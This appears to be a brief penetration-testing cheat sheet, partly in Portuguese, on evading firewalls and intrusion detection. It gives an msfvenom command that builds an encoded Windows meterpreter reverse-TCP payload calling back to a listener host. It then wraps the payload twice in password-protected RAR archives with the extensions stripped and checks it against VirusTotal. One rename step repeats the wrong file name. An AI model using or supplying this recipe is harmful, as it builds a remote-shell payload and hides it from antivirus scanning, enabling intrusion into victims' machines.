Firewall and IDS/IPS Evasion

• Generating Payload

msfvenom windows/x86/meterpreter_reverse_tcp LHOST=10.10.14.2 LPORT=8080 -k -e x86/shikata_ga_nai -a x86 --platform windows -o ~/test.js -i 5

• Archiving the Payload - Winrar

wget https://www.rarlab.com/rar/rarlinux-x64-612.tar.gz
tar -xzvf rarlinux-x64-612.tar.gz && cd rar
rar a ~/test.rar -p ~/test.js

• Removing the .RAR Extension

mv test.rar test
ls

• Archiving the Payload Again

rar a test2.rar -p test

• Removing the .RAR Extension

mv test.rar test
ls

• O arquivo test2 é o arquivo .rar final com a extensão (.rar) deletada do nome. Depois disso, podemos prosseguir para carregá-lo no VirusTotal para outra verificação.

msf-virustotal -k <API key> -f test2